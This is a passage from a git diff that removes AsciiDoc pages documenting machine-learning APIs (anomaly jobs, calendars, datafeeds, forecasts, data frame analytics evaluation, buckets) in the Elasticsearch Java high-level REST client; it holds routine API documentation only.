-include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing existing job IDs -<2> Optionally used to close a failed job, or to forcefully close a job -which has not responded to its initial close request. -<3> Optionally set to ignore if a wildcard expression matches no jobs. - (This includes `_all` string or when no jobs have been specified) -<4> Optionally setting the `timeout` value for how long the -execution should wait for the job to be closed. - -[id="{upid}-{api}-response"] -==== Close {anomaly-jobs} response - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `isClosed()` from the +{response}+ indicates if the job was successfully -closed or not. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/delete-calendar-event.asciidoc b/docs/java-rest/high-level/ml/delete-calendar-event.asciidoc deleted file mode 100644 index e5879726457..00000000000 --- a/docs/java-rest/high-level/ml/delete-calendar-event.asciidoc +++ /dev/null @@ -1,38 +0,0 @@ --- -:api: delete-calendar-event -:request: DeleteCalendarEventRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete calendar events API - -Removes a scheduled event from an existing {ml} calendar. -The API accepts a +{request}+ and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Delete calendar events request - -A +{request}+ is constructed referencing a non-null -calendar ID, and eventId which to remove from the calendar - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The ID of the calendar from which to remove the jobs -<2> The eventId to remove from the calendar - -[id="{upid}-{api}-response"] -==== Delete calendar events response - -The returned +{response}+ acknowledges the success of the request: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Acknowledgement of the request and its success - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/delete-calendar-job.asciidoc b/docs/java-rest/high-level/ml/delete-calendar-job.asciidoc deleted file mode 100644 index cbfd2f40a8b..00000000000 --- a/docs/java-rest/high-level/ml/delete-calendar-job.asciidoc +++ /dev/null @@ -1,38 +0,0 @@ --- -:api: delete-calendar-job -:request: DeleteCalendarJobRequest -:response: PutCalendarResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete {anomaly-jobs} from calendar API - -Removes {anomaly-jobs} from an existing {ml} calendar. -The API accepts a +{request}+ and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Delete {anomaly-jobs} from calendar request - -A +{request}+ is constructed referencing a non-null -calendar ID, and JobIDs which to remove from the calendar - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The ID of the calendar from which to remove the jobs -<2> The JobIds to remove from the calendar - -[id="{upid}-{api}-response"] -==== Delete {anomaly-jobs} from calendar response - -The returned +{response}+ contains the updated Calendar: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The updated calendar with the jobs removed - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/delete-calendar.asciidoc b/docs/java-rest/high-level/ml/delete-calendar.asciidoc deleted file mode 100644 index 1c35164ad57..00000000000 --- a/docs/java-rest/high-level/ml/delete-calendar.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ --- -:api: delete-calendar -:request: DeleteCalendarRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete calendars API - -Deletes a {ml} calendar. -The API accepts a +{request}+ and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Delete calendars request - -A `DeleteCalendar` object requires a non-null `calendarId`. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Constructing a new request referencing an existing calendar - -[id="{upid}-{api}-response"] -==== Delete calendars response - -The returned +{response}+ object indicates the acknowledgement of the request: -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] ---------------------------------------------------- -<1> `isAcknowledged` was the deletion request acknowledged or not - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/delete-data-frame-analytics.asciidoc b/docs/java-rest/high-level/ml/delete-data-frame-analytics.asciidoc deleted file mode 100644 index 4967d137894..00000000000 --- a/docs/java-rest/high-level/ml/delete-data-frame-analytics.asciidoc +++ /dev/null @@ -1,43 +0,0 @@ --- -:api: delete-data-frame-analytics -:request: DeleteDataFrameAnalyticsRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete {dfanalytics-jobs} API - -experimental::[] - -Delete an existing {dfanalytics-job}. -The API accepts a +{request}+ object as a request and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Delete {dfanalytics-jobs} request - -A +{request}+ object requires a {dfanalytics-job} ID. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Constructing a new request referencing an existing {dfanalytics-job}. - -==== Optional arguments - -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] ---------------------------------------------------- -<1> Use to forcefully delete a job that is not stopped. This method is quicker than stopping -and deleting the job. Defaults to `false`. -<2> Use to set the time to wait until the job is deleted. Defaults to 1 minute. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ object acknowledges the {dfanalytics-job} deletion. diff --git a/docs/java-rest/high-level/ml/delete-datafeed.asciidoc b/docs/java-rest/high-level/ml/delete-datafeed.asciidoc deleted file mode 100644 index d2b81d1e8b7..00000000000 --- a/docs/java-rest/high-level/ml/delete-datafeed.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ --- -:api: delete-datafeed -:request: DeleteDatafeedRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-delete-datafeed"] -=== Delete datafeeds API - -Deletes an existing datafeed. - -[id="{upid}-{api}-request"] -==== Delete datafeeds request - -A +{request}+ object requires a non-null `datafeedId` and can optionally set `force`. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Use to forcefully delete a started datafeed. This method is quicker than -stopping and deleting the datafeed. Defaults to `false`. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Delete datafeeds response - -The returned +{response}+ object indicates the acknowledgement of the request: -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] ---------------------------------------------------- -<1> `isAcknowledged` was the deletion request acknowledged or not. diff --git a/docs/java-rest/high-level/ml/delete-expired-data.asciidoc b/docs/java-rest/high-level/ml/delete-expired-data.asciidoc deleted file mode 100644 index b86cc3723e2..00000000000 --- a/docs/java-rest/high-level/ml/delete-expired-data.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ - --- -:api: delete-expired-data -:request: DeleteExpiredRequest -:response: DeleteExpiredResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete expired data API - -Deletes expired {ml} data. -The API accepts a +{request}+ and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Delete expired data request - -A `DeleteExpiredDataRequest` object does not require any arguments. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Constructing a new request. -<2> Optionally set a job ID. Use `null` for the default wild card all `*`. -<3> Providing requests per second throttling for the - deletion processes. Default is no throttling. -<4> Setting how long the deletion processes will be allowed - to run before they are canceled. Default value is `8h` (8 hours). - -[id="{upid}-{api}-response"] -==== Delete expired data response - -The returned +{response}+ object indicates the acknowledgement of the request: -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] ---------------------------------------------------- -<1> `getDeleted` acknowledges the deletion request. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/delete-filter.asciidoc b/docs/java-rest/high-level/ml/delete-filter.asciidoc deleted file mode 100644 index 29659f8a51e..00000000000 --- a/docs/java-rest/high-level/ml/delete-filter.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ --- -:api: delete-filter -:request: DeleteFilterRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete filters API - -Deletes a {ml} filter. -The API accepts a +{request}+ and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Delete filters request - -A +{request}+ object requires a non-null `filterId`. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Constructing a new request referencing an existing filter - -[id="{upid}-{api}-response"] -==== Delete filters response - -The returned +{response}+ object indicates the acknowledgement of the request: -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] ---------------------------------------------------- -<1> `isAcknowledged` was the deletion request acknowledged or not - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/delete-forecast.asciidoc b/docs/java-rest/high-level/ml/delete-forecast.asciidoc deleted file mode 100644 index 49996752024..00000000000 --- a/docs/java-rest/high-level/ml/delete-forecast.asciidoc +++ /dev/null @@ -1,51 +0,0 @@ --- -:api: delete-forecast -:request: DeleteForecastRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete forecasts API - -Deletes forecasts from an {anomaly-job}. -It accepts a +{request}+ object and responds -with an +{response}+ object. - -[id="{upid}-{api}-request"] -==== Delete forecasts request - -A +{request}+ object gets created with an existing non-null `jobId`. -All other fields are optional for the request. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing an existing `jobId` - -==== Optional arguments - -The following arguments are optional. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] --------------------------------------------------- -<1> Sets the specific forecastIds to delete, can be set to `_all` to indicate ALL forecasts for the given -`jobId` -<2> Set the timeout for the request to respond, default is 30 seconds -<3> Set the `allow_no_forecasts` option. When `true` no error will be returned if an `_all` -request finds no forecasts. It defaults to `true` - -[id="{upid}-{api}-response"] -==== Delete forecasts response - -An +{response}+ contains an acknowledgement of the forecast(s) deletion - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `isAcknowledged()` indicates if the forecast was successfully deleted or not. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/delete-job.asciidoc b/docs/java-rest/high-level/ml/delete-job.asciidoc deleted file mode 100644 index ad4c147c491..00000000000 --- a/docs/java-rest/high-level/ml/delete-job.asciidoc +++ /dev/null @@ -1,58 +0,0 @@ --- -:api: delete-job -:request: DeleteJobRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete {anomaly-jobs} API - -Deletes an {anomaly-job} that exists in the cluster. - -[id="{upid}-{api}-request"] -==== Delete {anomaly-jobs} request - -A +{request}+ object requires a non-null `jobId` and can optionally set `force`. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Constructing a new request referencing an existing `jobId` - -==== Optional arguments - -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-force] ---------------------------------------------------- -<1> Use to forcefully delete an opened job. This method is quicker than closing -and deleting the job. Defaults to `false`. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-wait-for-completion] ---------------------------------------------------- -<1> Use to set whether the request should wait until the operation has completed -before returning. Defaults to `true`. - - -[id="{upid}-{api}-response"] -==== Delete {anomaly-jobs} response - -The returned +{response}+ object indicates the acknowledgement of the job -deletion or the deletion task depending on whether the request was set to wait -for completion: - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] ---------------------------------------------------- -<1> Whether job deletion was acknowledged or not. It will be `null` when set -to not wait for completion. -<2> The ID of the job deletion task. It will be `null` when set to wait for -completion. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/delete-model-snapshot.asciidoc b/docs/java-rest/high-level/ml/delete-model-snapshot.asciidoc deleted file mode 100644 index a1ad2884bdf..00000000000 --- a/docs/java-rest/high-level/ml/delete-model-snapshot.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ --- -:api: delete-model-snapshot -:request: DeleteModelSnapshotRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete model snapshots API - -Deletes an existing model snapshot. - -[id="{upid}-{api}-request"] -==== Delete model snapshots request - -A +{request}+ object requires both a non-null `jobId` and a non-null `snapshotId`. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Constructing a new request referencing existing `jobId` and `snapshotId`. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Delete model snapshots response - -The returned +{response}+ object indicates the acknowledgement of the request: -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] ---------------------------------------------------- -<1> `isAcknowledged` was the deletion request acknowledged or not diff --git a/docs/java-rest/high-level/ml/delete-trained-models.asciidoc b/docs/java-rest/high-level/ml/delete-trained-models.asciidoc deleted file mode 100644 index f906e71f1b6..00000000000 --- a/docs/java-rest/high-level/ml/delete-trained-models.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: delete-trained-models -:request: DeleteTrainedModelRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete trained models API - -experimental::[] - -Deletes a previously saved trained model. -The API accepts a +{request}+ object and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Delete trained models request - -A +{request}+ requires a valid trained model ID. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new DELETE request referencing an existing trained model - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ object acknowledges the trained model deletion. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/ml/estimate-model-memory.asciidoc b/docs/java-rest/high-level/ml/estimate-model-memory.asciidoc deleted file mode 100644 index 8e8b5f1befa..00000000000 --- a/docs/java-rest/high-level/ml/estimate-model-memory.asciidoc +++ /dev/null @@ -1,42 +0,0 @@ --- -:api: estimate-model-memory -:request: EstimateModelMemoryRequest -:response: EstimateModelMemoryResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Estimate {anomaly-job} model memory API - -Estimate the model memory an analysis config is likely to need for -the given cardinality of the fields it references. - -[id="{upid}-{api}-request"] -==== Estimate {anomaly-job} model memory request - -A +{request}+ can be set up as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Pass an `AnalysisConfig` to the constructor. -<2> For any `by_field_name`, `over_field_name` or - `partition_field_name` fields referenced by the - detectors, supply overall cardinality estimates - in a `Map`. -<3> For any `influencers`, supply a `Map` containing - estimates of the highest cardinality expected in - any single bucket. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Estimate {anomaly-job} model memory response - -The returned +{response}+ contains the model memory estimate: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The model memory estimate. diff --git a/docs/java-rest/high-level/ml/evaluate-data-frame.asciidoc b/docs/java-rest/high-level/ml/evaluate-data-frame.asciidoc deleted file mode 100644 index 70485d30cf2..00000000000 --- a/docs/java-rest/high-level/ml/evaluate-data-frame.asciidoc +++ /dev/null @@ -1,139 +0,0 @@ --- -:api: evaluate-data-frame -:request: EvaluateDataFrameRequest -:response: EvaluateDataFrameResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Evaluate {dfanalytics} API - -experimental::[] - -Evaluates the {dfanalytics} for an annotated index. -The API accepts an +{request}+ object and returns an +{response}+. - -[id="{upid}-{api}-request"] -==== Evaluate {dfanalytics} request - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new evaluation request -<2> Reference to an existing index -<3> The query with which to select data from indices -<4> Evaluation to be performed - -==== Evaluation - -Evaluation to be performed. -Currently, supported evaluations include: +OutlierDetection+, +Classification+, +Regression+. - -===== Outlier detection - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-evaluation-outlierdetection] --------------------------------------------------- -<1> Constructing a new evaluation -<2> Name of the field in the index. Its value denotes the actual (i.e. ground truth) label for an example. Must be either true or false. -<3> Name of the field in the index. Its value denotes the probability (as per some ML algorithm) of the example being classified as positive. -<4> The remaining parameters are the metrics to be calculated based on the two fields described above -<5> {wikipedia}/Precision_and_recall#Precision[Precision] calculated at thresholds: 0.4, 0.5 and 0.6 -<6> {wikipedia}/Precision_and_recall#Recall[Recall] calculated at thresholds: 0.5 and 0.7 -<7> {wikipedia}/Confusion_matrix[Confusion matrix] calculated at threshold 0.5 -<8> {wikipedia}/Receiver_operating_characteristic#Area_under_the_curve[AuC ROC] calculated and the curve points returned - -===== Classification - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-evaluation-classification] --------------------------------------------------- -<1> Constructing a new evaluation -<2> Name of the field in the index. Its value denotes the actual (i.e. ground truth) class the example belongs to. -<3> Name of the field in the index. Its value denotes the predicted (as per some ML algorithm) class of the example. -<4> Name of the field in the index. Its value denotes the array of top classes. Must be nested. -<5> The remaining parameters are the metrics to be calculated based on the two fields described above -<6> Accuracy -<7> Precision -<8> Recall -<9> Multiclass confusion matrix of size 3 -<10> {wikipedia}/Receiver_operating_characteristic#Area_under_the_curve[AuC ROC] calculated for class "cat" treated as positive and the rest as negative - -===== Regression - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-evaluation-regression] --------------------------------------------------- -<1> Constructing a new evaluation -<2> Name of the field in the index. Its value denotes the actual (i.e. ground truth) value for an example. -<3> Name of the field in the index. Its value denotes the predicted (as per some ML algorithm) value for the example. -<4> The remaining parameters are the metrics to be calculated based on the two fields described above -<5> {wikipedia}/Mean_squared_error[Mean squared error] -<6> Mean squared logarithmic error -<7> {wikipedia}/Huber_loss#Pseudo-Huber_loss_function[Pseudo Huber loss] -<8> {wikipedia}/Coefficient_of_determination[R squared] - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the requested evaluation metrics. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Fetching all the calculated metrics results - -==== Results - -===== Outlier detection - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-results-outlierdetection] --------------------------------------------------- - -<1> Fetching precision metric by name -<2> Fetching precision at a given (0.4) threshold -<3> Fetching confusion matrix metric by name -<4> Fetching confusion matrix at a given (0.5) threshold - -===== Classification - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-results-classification] --------------------------------------------------- - -<1> Fetching accuracy metric by name -<2> Fetching the actual accuracy value -<3> Fetching precision metric by name -<4> Fetching the actual precision value -<5> Fetching recall metric by name -<6> Fetching the actual recall value -<7> Fetching multiclass confusion matrix metric by name -<8> Fetching the contents of the confusion matrix -<9> Fetching the number of classes that were not included in the matrix -<10> Fetching AucRoc metric by name -<11> Fetching the actual AucRoc score - -===== Regression - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-results-regression] --------------------------------------------------- - -<1> Fetching mean squared error metric by name -<2> Fetching the actual mean squared error value -<3> Fetching mean squared logarithmic error metric by name -<4> Fetching the actual mean squared logarithmic error value -<5> Fetching pseudo Huber loss metric by name -<6> Fetching the actual pseudo Huber loss value -<7> Fetching R squared metric by name -<8> Fetching the actual R squared value diff --git a/docs/java-rest/high-level/ml/explain-data-frame-analytics.asciidoc b/docs/java-rest/high-level/ml/explain-data-frame-analytics.asciidoc deleted file mode 100644 index 7d9ac1620ec..00000000000 --- a/docs/java-rest/high-level/ml/explain-data-frame-analytics.asciidoc +++ /dev/null @@ -1,50 +0,0 @@ --- -:api: explain-data-frame-analytics -:request: ExplainDataFrameAnalyticsRequest -:response: ExplainDataFrameAnalyticsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Explain {dfanalytics} API - -experimental::[] - -Explains the following about a {dataframe-analytics-config}: - -* field selection: which fields are included or not in the analysis -* memory estimation: how much memory is estimated to be required. The estimate can be used when deciding the appropriate value for `model_memory_limit` setting later on. - -The API accepts an +{request}+ object and returns an +{response}+. - -[id="{upid}-{api}-request"] -==== Explain {dfanalytics} request - -The request can be constructed with the id of an existing {dfanalytics-job}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-id-request] --------------------------------------------------- -<1> Constructing a new request with the id of an existing {dfanalytics-job} - -It can also be constructed with a {dataframe-analytics-config} to explain it before creating it. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config-request] --------------------------------------------------- -<1> Constructing a new request containing a {dataframe-analytics-config} - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the field selection and the memory usage estimation. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> A list where each item explains whether a field was selected for analysis or not -<2> The memory estimation for the {dfanalytics-job} diff --git a/docs/java-rest/high-level/ml/find-file-structure.asciidoc b/docs/java-rest/high-level/ml/find-file-structure.asciidoc deleted file mode 100644 index 8d73791ad19..00000000000 --- a/docs/java-rest/high-level/ml/find-file-structure.asciidoc +++ /dev/null @@ -1,55 +0,0 @@ --- -:api: find-file-structure -:request: FindFileStructureRequest -:response: FindFileStructureResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Find file structure API - -experimental::[] - -Determines the structure of a text file and other information that will be -useful to import its contents to an {es} index. It accepts a +{request}+ object -and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Find file structure request - -A sample from the beginning of the file (or the entire file contents if -it's small) must be added to the +{request}+ object using the -`FindFileStructureRequest#setSample` method. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Create a new `FindFileStructureRequest` object -<2> Add the contents of `anInterestingFile` to the request - -==== Optional arguments - -The following arguments are optional. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] --------------------------------------------------- -<1> Set the maximum number of lines to sample (the entire sample will be - used if it contains fewer lines) -<2> Request that an explanation of the analysis be returned in the response - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Find file structure response - -A +{response}+ contains information about the file structure, -as well as mappings and an ingest pipeline that could be used -to index the contents into {es}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The `FileStructure` object contains the structure information diff --git a/docs/java-rest/high-level/ml/flush-job.asciidoc b/docs/java-rest/high-level/ml/flush-job.asciidoc deleted file mode 100644 index cc2dd11268c..00000000000 --- a/docs/java-rest/high-level/ml/flush-job.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ --- -:api: flush-job -:request: FlushJobRequest -:response: FlushJobResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Flush jobs API - -Flushes an anomaly detection job's datafeed in the cluster. -It accepts a +{request}+ object and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Flush jobs request - -A +{request}+ object gets created with an existing non-null `jobId`. -All other fields are optional for the request. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing an existing `jobId` - -==== Optional arguments - -The following arguments are optional. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] --------------------------------------------------- -<1> Set request to calculate the interim results -<2> Set the advanced time to flush to the particular time value -<3> Set the start time for the range of buckets on which -to calculate the interim results (requires `calc_interim` to be `true`) -<4> Set the end time for the range of buckets on which -to calculate interim results (requires `calc_interim` to be `true`) -<5> Set the skip time to skip a particular time value - -[id="{upid}-{api}-response"] -==== Flush jobs response - -A +{response}+ contains an acknowledgement and an optional end date for the -last finalized bucket - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `isFlushed()` indicates if the job was successfully flushed or not. -<2> `getLastFinalizedBucketEnd()` provides the timestamp -(in milliseconds-since-the-epoch) of the end of the last bucket that was processed. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/forecast-job.asciidoc b/docs/java-rest/high-level/ml/forecast-job.asciidoc deleted file mode 100644 index 3cd4a263c5c..00000000000 --- a/docs/java-rest/high-level/ml/forecast-job.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ --- -:api: forecast-job -:request: ForecastJobRequest -:response: ForecastJobResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Forecast jobs API - -Forecasts a {ml} job's behavior based on historical data. It accepts a -+{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Forecast jobs request - -A +{request}+ object gets created with an existing non-null `jobId`. -All other fields are optional for the request. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing an existing `jobId` - -==== Optional arguments - -The following arguments are optional. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] --------------------------------------------------- -<1> Set when the forecast for the job should expire -<2> Set how far into the future should the forecast predict -<3> Set the maximum amount of memory the forecast is allowed to use. - Defaults to 20mb. Maximum is 500mb, minimum is 1mb. If set to - 40% or more of the job's configured memory limit, it is - automatically reduced to below that number. - -[id="{upid}-{api}-response"] -==== Forecast jobs response - -A +{response}+ contains an acknowledgement and the forecast ID - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `isAcknowledged()` indicates if the forecast was successful -<2> `getForecastId()` provides the ID of the forecast that was created - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/get-buckets.asciidoc b/docs/java-rest/high-level/ml/get-buckets.asciidoc deleted file mode 100644 index 14c9406969e..00000000000 --- a/docs/java-rest/high-level/ml/get-buckets.asciidoc +++ /dev/null @@ -1,95 +0,0 @@ --- -:api: get-buckets -:request: GetBucketsRequest -:response: GetBucketsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get buckets API - -Retrieves one or more bucket results. -It accepts a +{request}+ object and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Get buckets request - -A +{request}+ object gets created with an existing non-null `jobId`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing an existing `jobId`. - -==== Optional arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-timestamp] --------------------------------------------------- -<1> The timestamp of the bucket to get. Otherwise it will return all buckets. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-anomaly-score] --------------------------------------------------- -<1> Buckets with anomaly scores greater or equal than this value will be returned. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-desc] --------------------------------------------------- -<1> If `true`, the buckets are sorted in descending order. Defaults to `false`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-end] --------------------------------------------------- -<1> Buckets with timestamps earlier than this time will be returned. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-exclude-interim] --------------------------------------------------- -<1> If `true`, interim results will be excluded. Defaults to `false`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-expand] --------------------------------------------------- -<1> If `true`, buckets will include their anomaly records. Defaults to `false`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-page] --------------------------------------------------- -<1> The page parameters `from` and `size`. `from` specifies the number of buckets to skip. -`size` specifies the maximum number of buckets to get. Defaults to `0` and `100` respectively. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-sort] --------------------------------------------------- -<1> The field to sort buckets on. Defaults to `timestamp`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- 